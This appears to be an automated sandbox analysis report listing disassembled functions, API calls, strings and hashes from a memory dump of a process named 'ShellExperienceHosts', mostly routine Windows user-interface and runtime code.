Opcode ID: 43f7ca4ed0677aec70cfdcee2f85110a3c79b4a765b44affb18c65301054b982
Instruction ID: 5785e56e7d81c9c3e28a12c50f3d8a9f43602305b31b21f2d2b2c2f4668c0a3b
Opcode Fuzzy Hash: 43f7ca4ed0677aec70cfdcee2f85110a3c79b4a765b44affb18c65301054b982
Instruction Fuzzy Hash: 50F19F30A05669DBDF25CF74CC98BE9B7B8BF15318F1041AAD829A7680DB34DA85CF50

Function 6CA4211C Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 164COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA42123

Part of subcall function 6C9BE402: GetDlgCtrlID.USER32(?), ref: 6C9BE40D

Part of subcall function 6CA3F890: __EH_prolog3.LIBCMT ref: 6CA3F897

Strings

PinState, xrefs: 6CA422B8
RecentFrameAlignment, xrefs: 6CA42249
RectRecentDocked, xrefs: 6CA42217
%TsPane-%d, xrefs: 6CA42173
RectRecentFloat, xrefs: 6CA421FA
%TsPane-%d%x, xrefs: 6CA4218A
MRUWidth, xrefs: 6CA4229B
RecentRowIndex, xrefs: 6CA42261
Panes, xrefs: 6CA42133
IsFloating, xrefs: 6CA4227E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: H_prolog3$Ctrl
String ID: %TsPane-%d$%TsPane-%d%x$IsFloating$MRUWidth$Panes$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
API String ID: 3879667756-2628993547
Opcode ID: 623bc1b1e1bbacfec45f689eafb6fbfbf04306a7c0bd7bfd53a8fa1b3f64ab31
Instruction ID: d060e54736d02ff1cca8de2bdd22c7da6d2a97b07dba70aa3a6be56dd8dfcb88
Opcode Fuzzy Hash: 623bc1b1e1bbacfec45f689eafb6fbfbf04306a7c0bd7bfd53a8fa1b3f64ab31
Instruction Fuzzy Hash: A951AE35B00159ABCF04DFA4C8949FEBB76FF89314F084169E816AB780CB35AD09DB91

Function 6C9E3A97 Relevance: 18.1, APIs: 12, Instructions: 147COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C9E3AC1
GetCurrentProcess.KERNEL32 ref: 6C9E3ACC
DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000002), ref: 6C9E3ADF
GetLastError.KERNEL32 ref: 6C9E3B29
FlushFileBuffers.KERNEL32(000000FF,00000000,00000000,00000000), ref: 6C9E3B43
GetLastError.KERNEL32 ref: 6C9E3B59
GetFileSize.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000), ref: 6C9E3B76
GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6C9E3B84
GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6C9E3BA1
SetFilePointer.KERNEL32(000000FF,00000000,?,00000001,00000000,?,?,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C9E3BCA
GetLastError.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C9E3BD8
GetLastError.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C9E3BF5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$File$CurrentProcess$BuffersDuplicateFlushHandlePointerSize
String ID:
API String ID: 3214111443-0
Opcode ID: e1d99d198a16fd8fbfa58d1f1ee3dac7b63128974d5f8594db19eb680edcd1cd
Instruction ID: 493b7efdb585fbeb96c7157540b2bf49cf76d2a0ae0ab5378cf67ac9660b3795
Opcode Fuzzy Hash: e1d99d198a16fd8fbfa58d1f1ee3dac7b63128974d5f8594db19eb680edcd1cd
Instruction Fuzzy Hash: 9241B331A00214AFDF14ABB5D8899DF7BBCEF19624F148669F916D7680EB70ED04CB90

Function 6C9D2C0E Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 86COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 6C9D2C2E

Strings

D2D1CreateFactory, xrefs: 6C9D2C55
D2D1.dll, xrefs: 6C9D2C3B
DWrite.dll, xrefs: 6C9D2C9B
DWriteCreateFactory, xrefs: 6C9D2CB0
D2D1MakeRotateMatrix, xrefs: 6C9D2C8D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Initialize
String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
API String ID: 2538663250-1403614551
Opcode ID: a7dbe16e40b5f3a15d7388dfbb73be3be040e27c6acb23aab112c20c71119fab
Instruction ID: a8f95a993978d504d16289c3af202bbb11f10ec6a850da6680ac7863298be43f
Opcode Fuzzy Hash: a7dbe16e40b5f3a15d7388dfbb73be3be040e27c6acb23aab112c20c71119fab
Instruction Fuzzy Hash: 06218179200F45AFD7205F75EC48B1B76B8FF95259F118A29E45AE2940EB30EC058A20

Function 6C9E7F06 Relevance: 16.6, APIs: 11, Instructions: 149windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,0000420F,00000001), ref: 6C9E7F64
EnableMenuItem.USER32(?,0000420E,00000001), ref: 6C9E7F7F
CheckMenuItem.USER32(?,00004214,00000008), ref: 6C9E7FB3
CheckMenuItem.USER32(?,00004212,00000008), ref: 6C9E7FC5
CheckMenuItem.USER32(?,00004213,00000008), ref: 6C9E7FD8
EnableMenuItem.USER32(?,00004212,00000001), ref: 6C9E7FFA
EnableMenuItem.USER32(?,00004212,00000001), ref: 6C9E8029
EnableMenuItem.USER32(?,00004213,00000001), ref: 6C9E8038
EnableMenuItem.USER32(?,00004214,00000001), ref: 6C9E8047
EnableMenuItem.USER32(?,00004215,00000001), ref: 6C9E8099
CheckMenuItem.USER32(?,00004215,00000008), ref: 6C9E80B1

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ItemMenu$Enable$Check
String ID:
API String ID: 1852492618-0
Opcode ID: 3308fa3987568b194315e7c2b6d4083a5a3d6edf574ea512e65f5747734116e2
Instruction ID: f5b7bfdaa8e870275b2d3dd5e447fc98b97845ed3891bdfaeaf81ff6e30677b7
Opcode Fuzzy Hash: 3308fa3987568b194315e7c2b6d4083a5a3d6edf574ea512e65f5747734116e2
Instruction Fuzzy Hash: F3519B30A41215EFDF12CF58C984A9DBBB4FF29B05F0081A6F919ABA91D770D950CFA4

Function 6C9E28AF Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 389windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9E28B9
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6C9E2A91
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C9E2C59
InvalidateRect.USER32(?,00000000,00000001), ref: 6C9E2C7F
UpdateWindow.USER32(?), ref: 6C9E2CA1
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C9E2D5E
InvalidateRect.USER32(?,00000000,00000001), ref: 6C9E2D84
UpdateWindow.USER32(?), ref: 6C9E2DA6

Strings

:/\, xrefs: 6C9E2AD6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MessageSend$InvalidateRectUpdateWindow$H_prolog3_
String ID: :/\
API String ID: 2009545923-2793184486
Opcode ID: 614d3fa534be19f45bf3390052629a94aa16c3260b556487baf7632e2c50709a
Instruction ID: e8c8cd1fbe5bb8338b7e9f0e461551280d630950702bd44becf380fab6d3b182
Opcode Fuzzy Hash: 614d3fa534be19f45bf3390052629a94aa16c3260b556487baf7632e2c50709a
Instruction Fuzzy Hash: 12F15A35600659DFCB25EF20DD98BAD77B5BFA8304F140199D50AAB7A1CB70EA89DF00

Function 6C9A5E20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9A5E97
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C9A5FD6
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9A606B
Concurrency::cancel_current_task.LIBCPMT ref: 6C9A6085
Concurrency::cancel_current_task.LIBCPMT ref: 6C9A608A
Concurrency::cancel_current_task.LIBCPMT ref: 6C9A608F

Strings

true, xrefs: 6C9A5F95
bad locale name, xrefs: 6C9A6094
false, xrefs: 6C9A5F6B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_dtorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 2199893758-1062449267
Opcode ID: a87702f5df5d32985421584be3a9df449f87eed3ef7e77e2cd91837331cfa148
Instruction ID: e938d0d7b64ab8a6bb391cdfe964e43dc467505713b98e707e0a39c4413e4aaa
Opcode Fuzzy Hash: a87702f5df5d32985421584be3a9df449f87eed3ef7e77e2cd91837331cfa148
Instruction Fuzzy Hash: C7711DB09013449BEB10CFA5CA447DEBBF8AF14308F204569E825EBB81E775D54ACB91

Function 6C9BC775 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6C9BC77C
GetPropW.USER32(?,AfxOldWndProc423), ref: 6C9BC793
CallWindowProcW.USER32(?,?,00000110,?,?), ref: 6C9BC7F3

Part of subcall function 6C9BCCA9: GetWindowRect.USER32(6C9B5B59,6C9B5B59), ref: 6C9BCCE2
Part of subcall function 6C9BCCA9: GetWindow.USER32(00000004,00000004), ref: 6C9BCCFF

SetWindowLongW.USER32(?,000000FC,?), ref: 6C9BC816
RemovePropW.USER32(?,AfxOldWndProc423), ref: 6C9BC822
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6C9BC82D
GlobalDeleteAtom.KERNEL32(?), ref: 6C9BC837

Part of subcall function 6C9BCD4C: GetWindowRect.USER32(6C9B5B59,00000000), ref: 6C9BCD59

CallWindowProcW.USER32(?,?,?,?,?), ref: 6C9BC87F

Strings

AfxOldWndProc423, xrefs: 6C9BC787, 6C9BC81C, 6C9BC828

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
String ID: AfxOldWndProc423
API String ID: 3351853316-1060338832
Opcode ID: 07a632099abcc8c73f2927acf08291c8dd8773f63496cd11508a87fc9af9a924
Instruction ID: a357eb66239362300ab54c75bb386f1aa47bf95ac723fa7e5878e421ebcd019e
Opcode Fuzzy Hash: 07a632099abcc8c73f2927acf08291c8dd8773f63496cd11508a87fc9af9a924
Instruction Fuzzy Hash: 3A319872941258BBCB04AFB4DE48CFF7A7DEFAA314B150509F506B7A40DB34DA049B60

Function 6C9C9D9F Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 6C9C9DAF
GetSystemMetrics.USER32(00000048), ref: 6C9C9DD1
CreateFontW.GDI32(00000000,?,?,6C9C8F3A,00001000,?,?,?), ref: 6C9C9DD8
SelectObject.GDI32(00000000,00000000), ref: 6C9C9DE6
GetCharWidthW.GDI32(00000000,00000036,00000036,6CB863BC,?,?,6C9C8F3A,00001000,?,?,?), ref: 6C9C9DF8
SelectObject.GDI32(00000000,00000000), ref: 6C9C9E04
DeleteObject.GDI32(00000000), ref: 6C9C9E0B
ReleaseDC.USER32(00000000,00000000), ref: 6C9C9E14

Strings

Marlett, xrefs: 6C9C9DB5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 5b301f98f0f2098cdb54127924578b73d0b1dff904f736f5d1833d703271b863
Instruction ID: 69cc526f0f3f07b49891d66a5f0e68f4ae1d65daa191b0d6b6efd4ba8262b071
Opcode Fuzzy Hash: 5b301f98f0f2098cdb54127924578b73d0b1dff904f736f5d1833d703271b863
Instruction Fuzzy Hash: 3601C435341A907BDA321A6A5C8CE6F2E7CEBCBBA6B11450CF619E7181CB658801C631

Function 6C9B827B Relevance: 15.5, APIs: 10, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 393d732fe959f45cf635fdcf20795b83c90a3983b4d13b51cb4305d9ac2addd3
Instruction ID: 96bb3b7021643d698101bd681e183e526f2990920b5d150be6f69dedb0e158bf
Opcode Fuzzy Hash: 393d732fe959f45cf635fdcf20795b83c90a3983b4d13b51cb4305d9ac2addd3
Instruction Fuzzy Hash: 14029875A0060AEFCB09CFA9C884A9EB7B5FF4E314B15855AE915BBB10C730ED41CB94

Function 6C9F59FC Relevance: 15.4, APIs: 10, Instructions: 351windowtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9F5A6A
LoadCursorW.USER32(00000000,00007F00), ref: 6C9F5A98
GetClientRect.USER32(?,?), ref: 6C9F5ADA
IsWindowVisible.USER32(?), ref: 6C9F5D13
SetTimer.USER32(00000000,0000EC15,00000000), ref: 6C9F5D36
InvalidateRect.USER32(?,00000000,00000001,6CB8D448,00000000,00000000,00000000,00000000,00000053), ref: 6C9F5DA5
UpdateWindow.USER32(?), ref: 6C9F5DAE
__EH_prolog3_GS.LIBCMT ref: 6C9F5DD7
LoadCursorW.USER32(00000000,00007F00), ref: 6C9F5DFE
GetParent.USER32(?), ref: 6C9F5E47

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CursorH_prolog3_LoadRectWindow$ClientInvalidateParentTimerUpdateVisible
String ID:
API String ID: 706703367-0
Opcode ID: cc80aa28cc9179e7b39801440ab94c99c5865595b2e84e06fb9b630b8124b1dd
Instruction ID: c8ae6aac5b4c87e69a0439fc281d3d13b58196586da9060893919fd40212c73a
Opcode Fuzzy Hash: cc80aa28cc9179e7b39801440ab94c99c5865595b2e84e06fb9b630b8124b1dd
Instruction Fuzzy Hash: 10D18C34A01204AFDF148F64C884BED77B9BF59319F144179EC1AABB91DB70E946CBA0

Function 6C9EAD98 Relevance: 15.2, APIs: 10, Instructions: 245windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9EAD9F
MessageBeep.USER32(000000FF), ref: 6C9EADBD
ScreenToClient.USER32(?,?), ref: 6C9EAE3A
UpdateWindow.USER32(?), ref: 6C9EAEB5
UpdateWindow.USER32(?), ref: 6C9EAF03
__EH_prolog3.LIBCMT ref: 6C9EB04A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: UpdateWindow$BeepClientH_prolog3H_prolog3_MessageScreen
String ID:
API String ID: 786914320-0
Opcode ID: c2eadf29c891bc4649c5b95d0a5be2f33afadf5b5203347649233333f70adb74
Instruction ID: 7199bf2ece90e1b85a4ff407dba380a1fb98c5b8446cad75cdcde6be58893eec
Opcode Fuzzy Hash: c2eadf29c891bc4649c5b95d0a5be2f33afadf5b5203347649233333f70adb74
Instruction Fuzzy Hash: 5A91BF30B01706EBCF169F64C998AAD7BB5BF69319F140229E825A7B90CB31E845CF54

Function 6C9F8A35 Relevance: 15.2, APIs: 10, Instructions: 224timeCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6C9F8A7C
ScreenToClient.USER32(?,?), ref: 6C9F8A89
PtInRect.USER32(?,?,?), ref: 6C9F8AC8
PtInRect.USER32(?,?,?), ref: 6C9F8AED
KillTimer.USER32(0000EC16,0000EC16), ref: 6C9F8B20
InvalidateRect.USER32(00000001,?,00000001), ref: 6C9F8B38
InvalidateRect.USER32(00000001,?,00000001), ref: 6C9F8B4A
KillTimer.USER32(?,0000EC15), ref: 6C9F8CB1
ValidateRect.USER32(?,00000000), ref: 6C9F8CDE
RedrawWindow.USER32(00000185,00000000,00000000,00000185), ref: 6C9F8D1B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow
String ID:
API String ID: 1459077570-0
Opcode ID: d1ed5c3b48b768e8441fb364e1636aac0436d6d2e0ee3d25ef240242e362dabc
Instruction ID: 4d2c21137a103e315ddffe9023c92ac02ecda0c919ee087ac0939a31f3cc700b
Opcode Fuzzy Hash: d1ed5c3b48b768e8441fb364e1636aac0436d6d2e0ee3d25ef240242e362dabc
Instruction Fuzzy Hash: BD918D70B0060AAFCB59DF74C9849ADFBB8FF1A304F10066AE419A3A50DB30E951DF94

Function 6C9DA501 Relevance: 15.2, APIs: 10, Instructions: 212timeCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6C9DA522
GetWindowRect.USER32(?,?), ref: 6C9DA536
KillTimer.USER32(?,0000EC08), ref: 6C9DA5BB
ReleaseCapture.USER32 ref: 6C9DA5C1
SetCursor.USER32(00000000), ref: 6C9DA5C8
SetCursor.USER32(?), ref: 6C9DA61B
LoadCursorW.USER32(?,00000000), ref: 6C9DA633
SetCursor.USER32(00000000), ref: 6C9DA63A
GetParent.USER32(?), ref: 6C9DA6DB
UpdateWindow.USER32(?), ref: 6C9DA732

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Cursor$Window$CaptureKillLoadParentRectReleaseTimerUpdate
String ID:
API String ID: 2135910768-0
Opcode ID: f0960736fbf1f51689731210a0228e357da6e9011d844a13f8135fffc040b51d
Instruction ID: 0619ba71c4149d0f2522d7b1fff0d032d70c0228c04e852d840c5e25bec3dc43
Opcode Fuzzy Hash: f0960736fbf1f51689731210a0228e357da6e9011d844a13f8135fffc040b51d
Instruction Fuzzy Hash: 1E717935F14A15EBDF148F64C888AAEB779FF59304F168165E80AB7A41CB34FC618B90

Function 6CA3A65E Relevance: 15.2, APIs: 10, Instructions: 200COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CA3A668
GetObjectW.GDI32(?,00000018,?), ref: 6CA3A68D
GetObjectW.GDI32(?,00000054,?), ref: 6CA3A6D2
CreateCompatibleDC.GDI32(00000000), ref: 6CA3A7BE
SelectObject.GDI32(?,?), ref: 6CA3A7E0
GetPixel.GDI32(?,00000000,00000000), ref: 6CA3A83F
GetPixel.GDI32(?,?,00000000), ref: 6CA3A851
SetPixel.GDI32(?,00000000,00000000,00000000), ref: 6CA3A860
SetPixel.GDI32(?,?,00000000,00000000), ref: 6CA3A872
SelectObject.GDI32(?,00000000), ref: 6CA3A8C0

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
